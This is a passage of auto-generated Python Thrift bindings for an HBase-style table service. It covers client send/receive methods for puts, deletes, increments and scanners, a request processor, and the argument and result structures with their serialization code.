table args.puts = puts args.write(self._oprot) self._oprot.writeMessageEnd() self._oprot.trans.flush() def recv_putMultiple(self, ): (fname, mtype, rseqid) = self._iprot.readMessageBegin() if mtype == TMessageType.EXCEPTION: x = TApplicationException() x.read(self._iprot) self._iprot.readMessageEnd() raise x result = putMultiple_result() result.read(self._iprot) self._iprot.readMessageEnd() if result.io is not None: raise result.io return def deleteSingle(self, table, deleteSingle): """ Deletes as specified by the TDelete. Note: "delete" is a reserved keyword and cannot be used in Thrift thus the inconsistent naming scheme from the other functions. Parameters: - table: the table to delete from - deleteSingle: the TDelete to delete """ self.send_deleteSingle(table, deleteSingle) self.recv_deleteSingle() def send_deleteSingle(self, table, deleteSingle): self._oprot.writeMessageBegin('deleteSingle', TMessageType.CALL, self._seqid) args = deleteSingle_args() args.table = table args.deleteSingle = deleteSingle args.write(self._oprot) self._oprot.writeMessageEnd() self._oprot.trans.flush() def recv_deleteSingle(self, ): (fname, mtype, rseqid) = self._iprot.readMessageBegin() if mtype == TMessageType.EXCEPTION: x = TApplicationException() x.read(self._iprot) self._iprot.readMessageEnd() raise x result = deleteSingle_result() result.read(self._iprot) self._iprot.readMessageEnd() if result.io is not None: raise result.io return def deleteMultiple(self, table, deletes): """ Bulk commit a List of TDeletes to the table. Throws a TIOError if any of the deletes fail. Always returns an empty list for backwards compatibility. Parameters: - table: the table to delete from - deletes: list of TDeletes to delete """ self.send_deleteMultiple(table, deletes) return self.recv_deleteMultiple() def send_deleteMultiple(self, table, deletes): self._oprot.writeMessageBegin('deleteMultiple', TMessageType.CALL, self._seqid) args = deleteMultiple_args() args.table = table args.deletes = deletes args.write(self._oprot) self._oprot.writeMessageEnd() self._oprot.trans.flush() def recv_deleteMultiple(self, ): (fname, mtype, rseqid) = self._iprot.readMessageBegin() if mtype == TMessageType.EXCEPTION: x = TApplicationException() x.read(self._iprot) self._iprot.readMessageEnd() raise x result = deleteMultiple_result() result.read(self._iprot) self._iprot.readMessageEnd() if result.success is not None: return result.success if result.io is not None: raise result.io raise TApplicationException(TApplicationException.MISSING_RESULT, "deleteMultiple failed: unknown result"); def checkAndDelete(self, table, row, family, qualifier, value, deleteSingle): """ Atomically checks if a row/family/qualifier value matches the expected value. If it does, it adds the delete. @return true if the new delete was executed, false otherwise Parameters: - table: to check in and delete from - row: row to check - family: column family to check - qualifier: column qualifier to check - value: the expected value, if not provided the check is for the non-existence of the column in question - deleteSingle: the TDelete to execute if the check succeeds """ self.send_checkAndDelete(table, row, family, qualifier, value, deleteSingle) return self.recv_checkAndDelete() def send_checkAndDelete(self, table, row, family, qualifier, value, deleteSingle): self._oprot.writeMessageBegin('checkAndDelete', TMessageType.CALL, self._seqid) args = checkAndDelete_args() args.table = table args.row = row args.family = family args.qualifier = qualifier args.value = value args.deleteSingle = deleteSingle args.write(self._oprot) self._oprot.writeMessageEnd() self._oprot.trans.flush() def recv_checkAndDelete(self, ): (fname, mtype, rseqid) = self._iprot.readMessageBegin() if mtype == TMessageType.EXCEPTION: x = TApplicationException() x.read(self._iprot) self._iprot.readMessageEnd() raise x result = checkAndDelete_result() result.read(self._iprot) self._iprot.readMessageEnd() if result.success is not None: return result.success if result.io is not None: raise result.io raise TApplicationException(TApplicationException.MISSING_RESULT, "checkAndDelete failed: unknown result"); def increment(self, table, increment): """ Parameters: - table: the table to increment the value on - increment: the TIncrement to increment """ self.send_increment(table, increment) return self.recv_increment() def send_increment(self, table, increment): self._oprot.writeMessageBegin('increment', TMessageType.CALL, self._seqid) args = increment_args() args.table = table args.increment = increment args.write(self._oprot) self._oprot.writeMessageEnd() self._oprot.trans.flush() def recv_increment(self, ): (fname, mtype, rseqid) = self._iprot.readMessageBegin() if mtype == TMessageType.EXCEPTION: x = TApplicationException() x.read(self._iprot) self._iprot.readMessageEnd() raise x result = increment_result() result.read(self._iprot) self._iprot.readMessageEnd() if result.success is not None: return result.success if result.io is not None: raise result.io raise TApplicationException(TApplicationException.MISSING_RESULT, "increment failed: unknown result"); def openScanner(self, table, scan): """ Get a Scanner for the provided TScan object. @return Scanner Id to be used with other scanner procedures Parameters: - table: the table to get the Scanner for - scan: the scan object to get a Scanner for """ self.send_openScanner(table, scan) return self.recv_openScanner() def send_openScanner(self, table, scan): self._oprot.writeMessageBegin('openScanner', TMessageType.CALL, self._seqid) args = openScanner_args() args.table = table args.scan = scan args.write(self._oprot) self._oprot.writeMessageEnd() self._oprot.trans.flush() def recv_openScanner(self, ): (fname, mtype, rseqid) = self._iprot.readMessageBegin() if mtype == TMessageType.EXCEPTION: x = TApplicationException() x.read(self._iprot) self._iprot.readMessageEnd() raise x result = openScanner_result() result.read(self._iprot) self._iprot.readMessageEnd() if result.success is not None: return result.success if result.io is not None: raise result.io raise TApplicationException(TApplicationException.MISSING_RESULT, "openScanner failed: unknown result"); def getScannerRows(self, scannerId, numRows): """ Grabs multiple rows from a Scanner. @return Between zero and numRows TResults Parameters: - scannerId: the Id of the Scanner to return rows from. This is an Id returned from the openScanner function. - numRows: number of rows to return """ self.send_getScannerRows(scannerId, numRows) return self.recv_getScannerRows() def send_getScannerRows(self, scannerId, numRows): self._oprot.writeMessageBegin('getScannerRows', TMessageType.CALL, self._seqid) args = getScannerRows_args() args.scannerId = scannerId args.numRows = numRows args.write(self._oprot) self._oprot.writeMessageEnd() self._oprot.trans.flush() def recv_getScannerRows(self, ): (fname, mtype, rseqid) = self._iprot.readMessageBegin() if mtype == TMessageType.EXCEPTION: x = TApplicationException() x.read(self._iprot) self._iprot.readMessageEnd() raise x result = getScannerRows_result() result.read(self._iprot) self._iprot.readMessageEnd() if result.success is not None: return result.success if result.io is not None: raise result.io if result.ia is not None: raise result.ia raise TApplicationException(TApplicationException.MISSING_RESULT, "getScannerRows failed: unknown result"); def closeScanner(self, scannerId): """ Closes the scanner. Should be called if you need to close the Scanner before all results are read. Exhausted scanners are closed automatically. Parameters: - scannerId: the Id of the Scanner to close * """ self.send_closeScanner(scannerId) self.recv_closeScanner() def send_closeScanner(self, scannerId): self._oprot.writeMessageBegin('closeScanner', TMessageType.CALL, self._seqid) args = closeScanner_args() args.scannerId = scannerId args.write(self._oprot) self._oprot.writeMessageEnd() self._oprot.trans.flush() def recv_closeScanner(self, ): (fname, mtype, rseqid) = self._iprot.readMessageBegin() if mtype == TMessageType.EXCEPTION: x = TApplicationException() x.read(self._iprot) self._iprot.readMessageEnd() raise x result = closeScanner_result() result.read(self._iprot) self._iprot.readMessageEnd() if result.io is not None: raise result.io if result.ia is not None: raise result.ia return class Processor(Iface, TProcessor): def __init__(self, handler): self._handler = handler self._processMap = {} self._processMap["exists"] = Processor.process_exists self._processMap["get"] = Processor.process_get self._processMap["getMultiple"] = Processor.process_getMultiple self._processMap["put"] = Processor.process_put self._processMap["checkAndPut"] = Processor.process_checkAndPut self._processMap["putMultiple"] = Processor.process_putMultiple self._processMap["deleteSingle"] = Processor.process_deleteSingle self._processMap["deleteMultiple"] = Processor.process_deleteMultiple self._processMap["checkAndDelete"] = Processor.process_checkAndDelete self._processMap["increment"] = Processor.process_increment self._processMap["openScanner"] = Processor.process_openScanner self._processMap["getScannerRows"] = Processor.process_getScannerRows self._processMap["closeScanner"] = Processor.process_closeScanner def process(self, iprot, oprot): (name, type, seqid) = iprot.readMessageBegin() if name not in self._processMap: iprot.skip(TType.STRUCT) iprot.readMessageEnd() x = TApplicationException(TApplicationException.UNKNOWN_METHOD, 'Unknown function %s' % (name)) oprot.writeMessageBegin(name, TMessageType.EXCEPTION, seqid) x.write(oprot) oprot.writeMessageEnd() oprot.trans.flush() return else: self._processMap[name](self, seqid, iprot, oprot) return True def process_exists(self, seqid, iprot, oprot): args = exists_args() args.read(iprot) iprot.readMessageEnd() result = exists_result() try: result.success = self._handler.exists(args.table, args.get) except TIOError as io: result.io = io oprot.writeMessageBegin("exists", TMessageType.REPLY, seqid) result.write(oprot) oprot.writeMessageEnd() oprot.trans.flush() def process_get(self, seqid, iprot, oprot): args = get_args() args.read(iprot) iprot.readMessageEnd() result = get_result() try: result.success = self._handler.get(args.table, args.get) except TIOError as io: result.io = io oprot.writeMessageBegin("get", TMessageType.REPLY, seqid) result.write(oprot) oprot.writeMessageEnd() oprot.trans.flush() def process_getMultiple(self, seqid, iprot, oprot): args = getMultiple_args() args.read(iprot) iprot.readMessageEnd() result = getMultiple_result() try: result.success = self._handler.getMultiple(args.table, args.gets) except TIOError as io: result.io = io oprot.writeMessageBegin("getMultiple", TMessageType.REPLY, seqid) result.write(oprot) oprot.writeMessageEnd() oprot.trans.flush() def process_put(self, seqid, iprot, oprot): args = put_args() args.read(iprot) iprot.readMessageEnd() result = put_result() try: self._handler.put(args.table, args.put) except TIOError as io: result.io = io oprot.writeMessageBegin("put", TMessageType.REPLY, seqid) result.write(oprot) oprot.writeMessageEnd() oprot.trans.flush() def process_checkAndPut(self, seqid, iprot, oprot): args = checkAndPut_args() args.read(iprot) iprot.readMessageEnd() result = checkAndPut_result() try: result.success = self._handler.checkAndPut(args.table, args.row, args.family, args.qualifier, args.value, args.put) except TIOError as io: result.io = io oprot.writeMessageBegin("checkAndPut", TMessageType.REPLY, seqid) result.write(oprot) oprot.writeMessageEnd() oprot.trans.flush() def process_putMultiple(self, seqid, iprot, oprot): args = putMultiple_args() args.read(iprot) iprot.readMessageEnd() result = putMultiple_result() try: self._handler.putMultiple(args.table, args.puts) except TIOError as io: result.io = io oprot.writeMessageBegin("putMultiple", TMessageType.REPLY, seqid) result.write(oprot) oprot.writeMessageEnd() oprot.trans.flush() def process_deleteSingle(self, seqid, iprot, oprot): args = deleteSingle_args() args.read(iprot) iprot.readMessageEnd() result = deleteSingle_result() try: self._handler.deleteSingle(args.table, args.deleteSingle) except TIOError as io: result.io = io oprot.writeMessageBegin("deleteSingle", TMessageType.REPLY, seqid) result.write(oprot) oprot.writeMessageEnd() oprot.trans.flush() def process_deleteMultiple(self, seqid, iprot, oprot): args = deleteMultiple_args() args.read(iprot) iprot.readMessageEnd() result = deleteMultiple_result() try: result.success = self._handler.deleteMultiple(args.table, args.deletes) except TIOError as io: result.io = io oprot.writeMessageBegin("deleteMultiple", TMessageType.REPLY, seqid) result.write(oprot) oprot.writeMessageEnd() oprot.trans.flush() def process_checkAndDelete(self, seqid, iprot, oprot): args = checkAndDelete_args() args.read(iprot) iprot.readMessageEnd() result = checkAndDelete_result() try: result.success = self._handler.checkAndDelete(args.table, args.row, args.family, args.qualifier, args.value, args.deleteSingle) except TIOError as io: result.io = io oprot.writeMessageBegin("checkAndDelete", TMessageType.REPLY, seqid) result.write(oprot) oprot.writeMessageEnd() oprot.trans.flush() def process_increment(self, seqid, iprot, oprot): args = increment_args() args.read(iprot) iprot.readMessageEnd() result = increment_result() try: result.success = self._handler.increment(args.table, args.increment) except TIOError as io: result.io = io oprot.writeMessageBegin("increment", TMessageType.REPLY, seqid) result.write(oprot) oprot.writeMessageEnd() oprot.trans.flush() def process_openScanner(self, seqid, iprot, oprot): args = openScanner_args() args.read(iprot) iprot.readMessageEnd() result = openScanner_result() try: result.success = self._handler.openScanner(args.table, args.scan) except TIOError as io: result.io = io oprot.writeMessageBegin("openScanner", TMessageType.REPLY, seqid) result.write(oprot) oprot.writeMessageEnd() oprot.trans.flush() def process_getScannerRows(self, seqid, iprot, oprot): args = getScannerRows_args() args.read(iprot) iprot.readMessageEnd() result = getScannerRows_result() try: result.success = self._handler.getScannerRows(args.scannerId, args.numRows) except TIOError as io: result.io = io except TIllegalArgument as ia: result.ia = ia oprot.writeMessageBegin("getScannerRows", TMessageType.REPLY, seqid) result.write(oprot) oprot.writeMessageEnd() oprot.trans.flush() def process_closeScanner(self, seqid, iprot, oprot): args = closeScanner_args() args.read(iprot) iprot.readMessageEnd() result = closeScanner_result() try: self._handler.closeScanner(args.scannerId) except TIOError as io: result.io = io except TIllegalArgument as ia: result.ia = ia oprot.writeMessageBegin("closeScanner", TMessageType.REPLY, seqid) result.write(oprot) oprot.writeMessageEnd() oprot.trans.flush() # HELPER FUNCTIONS AND STRUCTURES class exists_args: """ Attributes: - table: the table to check on - get: the TGet to check for """ thrift_spec = ( None, # 0 (1, TType.STRING, 'table', None, None, ), # 1 (2, TType.STRUCT, 'get', (TGet, TGet.thrift_spec), None, ), # 2 ) def __init__(self, table=None, get=None,): self.table = table self.get = get def read(self, iprot): if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None: fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec)) return iprot.readStructBegin() while True: (fname, ftype, fid) = iprot.readFieldBegin() if ftype == TType.STOP: break if fid == 1: if ftype == TType.STRING: self.table = iprot.readString(); else: iprot.skip(ftype) elif fid == 2: if ftype == TType.STRUCT: self.get = TGet() self.get.read(iprot) else: iprot.skip(ftype) else: iprot.skip(ftype) iprot.readFieldEnd() iprot.readStructEnd() def write(self, oprot): if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None: oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec))) return oprot.writeStructBegin('exists_args') if self.table is not None: oprot.writeFieldBegin('table', TType.STRING, 1) oprot.writeString(self.table) oprot.writeFieldEnd() if self.get is not None: oprot.writeFieldBegin('get', TType.STRUCT, 2) self.get.write(oprot) oprot.writeFieldEnd() oprot.writeFieldStop() oprot.writeStructEnd() def validate(self): if self.table is None: raise TProtocol.TProtocolException(message='Required field table is unset!') if self.get is None: raise TProtocol.TProtocolException(message='Required field get is unset!') return def __repr__(self): L = ['%s=%r' % (key, value) for key, value in self.__dict__.iteritems()] return '%s(%s)' % (self.__class__.__name__, ', '.join(L)) def __eq__(self, other): return isinstance(other, self.__class__) and self.__dict__ == other.__dict__ def __ne__(self, other): return not (self == other) class exists_result: """ Attributes: - success - io """ thrift_spec = ( (0, TType.BOOL, 'success', None, None, ), # 0 (1, TType.STRUCT, 'io', (TIOError, TIOError.thrift_spec), None, ), # 1 ) def __init__(self, success=None, io=None,): self.success = success self.io = io def read(self, iprot): if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None: fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec)) return iprot.readStructBegin() while True: (fname, ftype, fid) = iprot.readFieldBegin() if ftype == TType.STOP: break if fid == 0: if ftype == TType.BOOL: self.success = iprot.readBool(); else: iprot.skip(ftype) elif fid == 1: if ftype == TType.STRUCT: self.io = TIOError() self.io.read(iprot) else: iprot.skip(ftype) else: iprot.skip(ftype) iprot.readFieldEnd() iprot.readStructEnd() def write(self, oprot): if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None: oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec))) return oprot.writeStructBegin('exists_result') if self.success is not None: oprot.writeFieldBegin('success', TType.BOOL, 0) oprot.writeBool(self.success) oprot.writeFieldEnd() if self.io is not None: oprot.writeFieldBegin('io', TType.STRUCT, 1) self.io.write(oprot) oprot.writeFieldEnd() oprot.writeFieldStop() oprot.writeStructEnd() def validate(self): return def __repr__(self): L = ['%s=%r' % (key, value) for key, value in self.__dict__.iteritems()] return '%s(%s)' % (self.__class__.__name__, ', '.join(L)) def __eq__(self, other): return isinstance(other, self.__class__) and self.__dict__ == other.__dict__ def __ne__(self, other): return not (self == other) class get_args: """ Attributes: - table: the table to get from - get: the TGet to fetch """ thrift_spec = ( None, # 0 (1, TType.STRING, 'table', None, None, ), # 1 (2, TType.STRUCT, 'get', (TGet, TGet.thrift_spec), None, ), # 2 ) def __init__(self, table=None, get=None,): self.table = table self.get = get def read(self, iprot): if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None: fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec)) return iprot.readStructBegin() while True: (fname, ftype, fid) = iprot.readFieldBegin() if ftype == TType.STOP: break if fid == 1: if ftype == TType.STRING: self.table = iprot.readString(); else: iprot.skip(ftype) elif fid == 2: if ftype == TType.STRUCT: self.get = TGet() self.get.read(iprot) else: iprot.skip(ftype) else: iprot.skip(ftype) iprot.readFieldEnd() iprot.readStructEnd() def write(self, oprot): if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None: oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec))) return oprot.writeStructBegin('get_args') if self.table is not None: oprot.writeFieldBegin('table', TType.STRING, 1) oprot.writeString(self.table) oprot.writeFieldEnd() if self.get is not None: oprot.writeFieldBegin('get', TType.STRUCT, 2) self.get.write(oprot) oprot.writeFieldEnd() oprot.writeFieldStop() oprot.writeStructEnd() def validate(self): if self.table is None: raise TProtocol.TProtocolException(message='Required field table is unset!') if self.get is None: raise TProtocol.TProtocolException(message='Required field get is unset!') return def __repr__(self): L = ['%s=%r' % (key, value) for key, value in self.__dict__.iteritems()] return '%s(%s)' % (self.__class__.__name__, ', '.join(L)) def __eq__(self, other): return isinstance(other, self.__class__) and self.__dict__ == other.__dict__ def __ne__(self, other): return not (self == other) class get_result: """ Attributes: - success - io """ thrift_spec = ( (0, TType.STRUCT, 'success', (TResult, TResult.thrift_spec), None, ), # 0 (1, TType.STRUCT, 'io', (TIOError, TIOError.thrift_spec), None, ), # 1 ) def __init__(self, success=None, io=None,): self.success = success self.io = io def read(self, iprot): if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None: fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec)) return iprot.readStructBegin() while True: (fname, ftype, fid) = iprot.readFieldBegin() if ftype == TType.STOP: break if fid == 0: if ftype == TType.STRUCT: self.success = TResult() self.success.read(iprot) else: iprot.skip(ftype) elif fid == 1: if ftype == TType.STRUCT: self.io = TIOError() self.io.read(iprot) else: iprot.skip(ftype) else: iprot.skip(ftype) iprot.readFieldEnd() iprot.readStructEnd() def write(self, oprot): if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None: oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec))) return oprot.writeStructBegin('get_result') if self.success is not None: oprot.writeFieldBegin('success', TType.STRUCT, 0) self.success.write(oprot) oprot.writeFieldEnd() if self.io is not None: oprot.writeFieldBegin('io', TType.STRUCT, 1) self.io.write(oprot) oprot.writeFieldEnd() oprot.writeFieldStop() oprot.writeStructEnd() def validate(self): return def __repr__(self): L = ['%s=%r' % (key, value) for key, value in self.__dict__.iteritems()] return '%s(%s)' % (self.__class__.__name__, ', '.join(L)) def __eq__(self, other): return isinstance(other, self.__class__) and self.__dict__ == other.__dict__ def __ne__(self, other): return not (self == other) class getMultiple_args: """ Attributes: - table: the table to get from - gets: a list of TGets to fetch, the Result list will have the Results at corresponding positions or null if there was an error """ thrift_spec = ( None, # 0 (1, TType.STRING, 'table', None, None, ), # 1 (2, TType.LIST, 'gets', (TType.STRUCT,(TGet, TGet.thrift_spec)), None, ), # 2 ) def __init__(self, table=None, gets=None,): self.table = table self.gets = gets def read(self, iprot): if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None: fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec)) return iprot.readStructBegin() while True: (fname, ftype, fid) = iprot.readFieldBegin() if ftype == TType.STOP: break if fid == 1: if ftype == TType.STRING: self.table = iprot.readString(); else: iprot.skip(ftype) elif fid == 2: if ftype == TType.LIST: self.gets = [] (_etype45, _size42) = iprot.readListBegin() for _i46 in xrange(_size42): _elem47 = TGet() _elem47.read(iprot) self.gets.append(_elem47) iprot.readListEnd() else: iprot.skip(ftype) else: iprot.skip(ftype) iprot.readFieldEnd() iprot.readStructEnd() def write(self, oprot): if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None: oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec))) return oprot.writeStructBegin('getMultiple_args') if self.table is not None: oprot.writeFieldBegin('table', TType.STRING, 1) oprot.writeString(self.table) oprot.writeFieldEnd() if self.gets is not None: oprot.writeFieldBegin('gets', TType.LIST, 2) oprot.writeListBegin(TType.STRUCT, len(self.gets)) for iter48 in self.gets: iter48.write(oprot) oprot.writeListEnd() oprot.writeFieldEnd() oprot.writeFieldStop() oprot.writeStructEnd() def validate(self): if self.table is None: raise TProtocol.TProtocolException(message='Required field table is unset!') if self.gets is None: raise TProtocol.TProtocolException(message='Required field gets is unset!') return def __repr__(self): L = ['%s=%r' % (key, value) for key, value in self.__dict__.iteritems()] return '%s(%s)' % (self.__class__.__name__, ', '.join(L)) def __eq__(self, other): return isinstance(other, self.__class__) and self.__dict__ == other.__dict__ def __ne__(self, other): return not (self == other) class getMultiple_result: """ Attributes: - success - io """ thrift_spec = ( (0, TType.LIST, 'success', (TType.STRUCT,(TResult, TResult.thrift_spec)), None, ), # 0 (1, TType.STRUCT, 'io', (TIOError, TIOError.thrift_spec), None, ), # 1 ) def __init__(self, success=None, io=None,): self.success = success self.io = io def read(self, iprot): if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None: fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec)) return iprot.readStructBegin() while True: (fname, ftype, fid) = iprot.readFieldBegin() if ftype == TType.STOP: break if fid == 0: if ftype == TType.LIST: self.success = [] (_etype52, _size49) = iprot.readListBegin() for _i53 in xrange(_size49): _elem54 = TResult() _elem54.read(iprot) self.success.append(_elem54) iprot.readListEnd() else: iprot.skip(ftype) elif fid == 1: if ftype == TType.STRUCT: self.io = TIOError() self.io.read(iprot) else: iprot.skip(ftype) else: iprot.skip(ftype) iprot.readFieldEnd() iprot.readStructEnd() def write(self, oprot): if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None: oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec))) return oprot.writeStructBegin('getMultiple_result') if self.success is not None: oprot.writeFieldBegin('success', TType.LIST, 0) oprot.writeListBegin(TType.STRUCT, len(self.success)) for iter55 in self.success: iter55.write(oprot) oprot.writeListEnd() oprot.writeFieldEnd() if self.io is not None: oprot.writeFieldBegin('io', TType.STRUCT, 1) self.io.write(oprot) oprot.writeFieldEnd() oprot.writeFieldStop() oprot.writeStructEnd() def validate(self): return def __repr__(self): L = ['%s=%r' % (key, value) for key, value in self.__dict__.iteritems()] return '%s(%s)' % (self.__class__.__name__, ', '.join(L)) def __eq__(self, other): return isinstance(other, self.__class__) and self.__dict__ == other.__dict__ def __ne__(self, other): return not (self == other) class put_args: """ Attributes: - table: the table to put data in - put: the TPut to put """ thrift_spec = ( None, # 0 (1, TType.STRING, 'table', None, None, ), # 1 (2, TType.STRUCT, 'put', (TPut, TPut.thrift_spec), None, ), # 2 ) def __init__(self, table=None, put=None,): self.table = table self.put = put def read(self, iprot): if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None: fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec)) return iprot.readStructBegin() while True: (fname, ftype, fid) = iprot.readFieldBegin() if ftype == TType.STOP: break if fid == 1: if ftype == TType.STRING: self.table = iprot.readString(); else: iprot.skip(ftype) elif fid == 2: if ftype == TType.STRUCT: self.put = TPut() self.put.read(iprot) else: iprot.skip(ftype) else: iprot.skip(ftype) iprot.readFieldEnd() iprot.readStructEnd() def write(self, oprot): if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None: oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec))) return oprot.writeStructBegin('put_args') if self.table is not None: oprot.writeFieldBegin('table', TType.STRING, 1) oprot.writeString(self.table) oprot.writeFieldEnd() if self.put is not None: oprot.writeFieldBegin('put', TType.STRUCT, 2) self.put.write(oprot) oprot.writeFieldEnd() oprot.writeFieldStop() oprot.writeStructEnd() def validate(self): if self.table is None: raise TProtocol.TProtocolException(message='Required field table is unset!') if self.put is None: raise TProtocol.TProtocolException(message='Required field put is unset!') return def __repr__(self): L = ['%s=%r' % (key, value) for key, value in self.__dict__.iteritems()] return '%s(%s)' % (self.__class__.__name__, ', '.join(L)) def __eq__(self, other): return isinstance(other, self.__class__) and self.__dict__ == other.__dict__ def __ne__(self, other): return not (self == other) class put_result: """ Attributes: - io """ thrift_spec = ( None, # 0 (1, TType.STRUCT, 'io', (TIOError, TIOError.thrift_spec), None, ), # 1 ) def __init__(self, io=None,): self.io = io def read(self, iprot): if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None: fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec)) return iprot.readStructBegin() while True: (fname, ftype, fid) = iprot.readFieldBegin() if ftype == TType.STOP: break if fid == 1: if ftype == TType.STRUCT: self.io = TIOError() self.io.read(iprot) else: iprot.skip(ftype) else: iprot.skip(ftype) iprot.readFieldEnd() iprot.readStructEnd() def write(self, oprot): if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None: oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec))) return oprot.writeStructBegin('put_result') if self.io is not None: oprot.writeFieldBegin('io', TType.STRUCT, 1) self.io.write(oprot) oprot.writeFieldEnd() oprot.writeFieldStop() oprot.writeStructEnd() def validate(self): return def __repr__(self): L = ['%s=%r' % (key, value) for key, value in self.__dict__.iteritems()] return '%s(%s)' % (self.__class__.__name__, ', '.join(L)) def __eq__(self, other): return isinstance(other, self.__class__) and self.__dict__ == other.__dict__ def __ne__(self, other): return not (self == other) class checkAndPut_args: """ Attributes: - table: to check in and put to - row: row to check - family: column family to check - qualifier: column qualifier to check - value: the expected value, if not provided the check is for the non-existence of the column in question - put: the TPut to put if the check succeeds """ thrift_spec = ( None, # 0 (1, TType.STRING, 'table', None, None, ), # 1 (2, TType.STRING, 'row', None, None, ), # 2 (3, TType.STRING, 'family', None, None, ), # 3 (4, TType.STRING, 'qualifier', None, None, ), # 4 (5, TType.STRING, 'value', None, None, ), # 5 (6, TType.STRUCT, 'put', (TPut, TPut.thrift_spec), None, ), # 6 ) def __init__(self, table=None, row=None, family=None, qualifier=None, value=None, put=None,): self.table = table self.row = row self.family = family self.qualifier = qualifier self.value = value self.put = put def read(self, iprot): if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None: fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec)) return iprot.readStructBegin() while True: (fname, ftype, fid) = iprot.readFieldBegin() if ftype == TType.STOP: break if fid == 1: if ftype == TType.STRING: self.table = iprot.readString(); else: iprot.skip(ftype) elif fid == 2: if ftype == TType.STRING: self.row = iprot.readString(); else: iprot.skip(ftype) elif fid == 3: if ftype == TType.STRING: self.family = iprot.readString(); else: iprot.skip(ftype) elif fid == 4: if ftype == TType.STRING: self.qualifier = iprot.readString(); else: iprot.skip(ftype) elif fid == 5: if ftype == TType.STRING: self.value = iprot.readString(); else: iprot.skip(ftype) elif fid == 6: if ftype == TType.STRUCT: self.put = TPut() self.put.read(iprot) else: iprot.skip(ftype) else: iprot.skip(ftype) iprot.readFieldEnd() iprot.readStructEnd() def write(self, oprot): if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None: oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec))) return oprot.writeStructBegin('checkAndPut_args') if self.table is not None: oprot.writeFieldBegin('table', TType.STRING, 1) oprot.writeString(self.table) oprot.writeFieldEnd() if self.row is not None: oprot.writeFieldBegin('row', TType.STRING, 2) oprot.writeString(self.row) oprot.writeFieldEnd() if self.family is not None: oprot.writeFieldBegin('family', TType.STRING, 3) oprot.writeString(self.family) oprot.writeFieldEnd() if self.qualifier is not None: oprot.writeFieldBegin('qualifier', TType.STRING, 4) oprot.writeString(self.qualifier) oprot.writeFieldEnd() if self.value is not None: oprot.writeFieldBegin('value', TType.STRING, 5) oprot.writeString(self.value) oprot.writeFieldEnd() if self.put is not None: oprot.writeFieldBegin('put', TType.STRUCT, 6) self.put.write(oprot) oprot.writeFieldEnd() oprot.writeFieldStop() oprot.writeStructEnd() def validate(self): if self.table is None: raise TProtocol.TProtocolException(message='Required field table is unset!') if self.row is None: raise TProtocol.TProtocolException(message='Required field row is unset!') if self.family is None: raise TProtocol.TProtocolException(message='Required field family is unset!') if self.qualifier is None: raise TProtocol.TProtocolException(message='Required field qualifier is unset!') if self.put is None: raise TProtocol.TProtocolException(message='Required field put is unset!') return def __repr__(self): L = ['%s=%r' % (key, value) for key, value in self.__dict__.iteritems()] return '%s(%s)' % (self.__class__.__name__, ', '.join(L)) def __eq__(self, other): return isinstance(other, self.__class__) and self.__dict__ == other.__dict__ def __ne__(self, other): return not (self == other) class checkAndPut_result: """ Attributes: - success - io """ thrift_spec = ( (0, TType.BOOL, 'success', None, 